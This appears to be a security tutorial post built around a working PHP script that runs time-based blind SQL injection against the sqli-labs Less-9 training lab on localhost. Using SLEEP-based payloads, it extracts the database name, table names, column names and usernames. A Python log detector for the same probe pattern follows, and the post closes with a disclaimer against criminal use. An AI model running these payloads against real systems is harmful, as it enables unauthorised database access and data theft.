PHP code for blind SQL injection against a database

Automated database blind-injection code

<?php
function juhecurl($url,$params=false,$ispost=0){
    $httpInfo = array();
    $ch = curl_init();

    curl_setopt( $ch, CURLOPT_HTTP_VERSION , CURL_HTTP_VERSION_1_1 );
    curl_setopt( $ch, CURLOPT_USERAGENT , 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36' );
    curl_setopt( $ch, CURLOPT_CONNECTTIMEOUT , 30 );
    curl_setopt( $ch, CURLOPT_TIMEOUT , 30);
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER , true );
    if( $ispost )
    {
        curl_setopt( $ch , CURLOPT_POST , true );
        curl_setopt( $ch , CURLOPT_POSTFIELDS , $params );
        curl_setopt( $ch , CURLOPT_URL , $url );
    }
    else
    {
        if($params){
            curl_setopt( $ch , CURLOPT_URL , $url.'?'.$params );
        }else{
            curl_setopt( $ch , CURLOPT_URL , $url);
        }
    }
    $response = curl_exec( $ch );
    if ($response === FALSE) {
        //echo "cURL Error: " . curl_error($ch);
        return false;
    }
    $httpCode = curl_getinfo( $ch , CURLINFO_HTTP_CODE );
    $httpInfo = array_merge( $httpInfo , curl_getinfo( $ch ) );
    curl_close( $ch );
    return $response;
}
// Enumerate the database name
//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";
// Enumerate tables
//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";
// Enumerate columns
//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273),%d,1))) = %d),sleep(2),'2')-- -";
// Extract data
$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
$url = 'http://127.0.0.1/SQLInj/sqli-labs/Less-9/';
// Outer loop: character position in the result string (1..40).
for($i=1;$i<=40;$i++){
    // Inner loop: candidate ASCII codes 32..127 for that position.
    for($a=32;$a<=127;$a++){
        $payload = sprintf($_Payload,$i,$a);
        $b = "id=".urlencode($payload);
        // Time the request: a correct guess makes the query run sleep(2).
        $begin_time=time();
        $res = juhecurl($url,$b,0);
        $end_time=time() - $begin_time;
        if ($end_time>1){
            // Delayed response: this code is the character at position $i.
            echo chr($a);
            break;
        }
    }
}
?>

Enumerate the database name


//$_Payload = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -";


Enumerate tables

//$_Payload = "1' and if((ASCII((substr((select group_concat(table_name) from information_schema.`TABLES` where TABLE_schema=0x7365637572697479),%d,1))) = %d),sleep(2),'2')-- -";


Enumerate columns

//$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(column_name) from information_schema.`COLUMNS` where TABLE_schema=0x7365637572697479 and table_name=0x7573657273),%d,1))) = %d),sleep(2),'2')-- -";


Extract data

$_Payload = "1' and if((ASCII((substr((select GROUP_CONCAT(username) from `security`.users ),%d,1))) = %d),sleep(2),'2')-- -";
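
Seen from the server side, the script above produces one GET request per position/character-code guess, all sharing the same `ASCII(SUBSTR(…,N,1)) = M` plus `SLEEP` shape. The following Python check is an added example, not part of the original post: it scans access-log lines for that shape and groups hits by client; the log format, the sample lines, the `min_probes` threshold and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, quote_plus, urlsplit

# Request line of a combined-format access log entry: client, target, status.
LOG = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# A delay primitive in a parameter value.
DELAY = re.compile(r"\b(?:sleep|benchmark)\s*\(", re.I)
# One-character comparison: ASCII(SUBSTR(<expr>, <position>, 1)) = <code>.
PROBE = re.compile(
    r"(?:ascii|ord)\s*\(.*?(?:substr|substring|mid)\s*\(.*,\s*(\d+)\s*,\s*1\s*\)+\s*=\s*(\d+)",
    re.I | re.S)


def sample_log():
    """Constructed log lines (not real traffic): one normal request, then
    requests shaped like the page's database-name payload, URL-encoded."""
    tmpl = "1' and if((ASCII((SUBSTR(DATABASE(),%d,1))) = %d),SLEEP(2),'2')-- -"
    fmt = '%s - - [01/Jan/2024:10:00:00 +0000] "GET /SQLInj/sqli-labs/Less-9/?id=%s HTTP/1.1" 200 512'
    lines = [fmt % ("192.0.2.10", "1")]
    for pos in (1, 2):
        for code in range(97, 101):
            lines.append(fmt % ("192.0.2.77", quote_plus(tmpl % (pos, code))))
    return lines


def detect(lines, min_probes=5):
    """Return {(client, path): {"probes": n, "positions": set}} for every
    client whose probe count on one path reaches min_probes."""
    seen = defaultdict(lambda: {"probes": 0, "positions": set()})
    for line in lines:
        m = LOG.match(line)
        if not m:
            continue
        client, target = m.group(1), urlsplit(m.group(2))
        # parse_qsl undoes the URL encoding ("+" and %XX) before matching.
        for _name, value in parse_qsl(target.query, keep_blank_values=True):
            probe = PROBE.search(value)
            if probe and DELAY.search(value):
                entry = seen[(client, target.path)]
                entry["probes"] += 1
                entry["positions"].add(int(probe.group(1)))
    return {key: hit for key, hit in seen.items() if hit["probes"] >= min_probes}


if __name__ == "__main__":
    for (client, path), hit in detect(sample_log()).items():
        print(client, path, hit["probes"], sorted(hit["positions"]))
```

The patterns cover only the payload shape shown on this page. POST bodies do not appear in access logs, so this check sees GET parameters only.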

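Statement: I firmly oppose using teaching methods to commit crimes, and all criminal acts will be severely punished. A clean internet needs all of us to maintain it. I recommend instead that everyone learn the principles behind these techniques in order to defend against them better.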
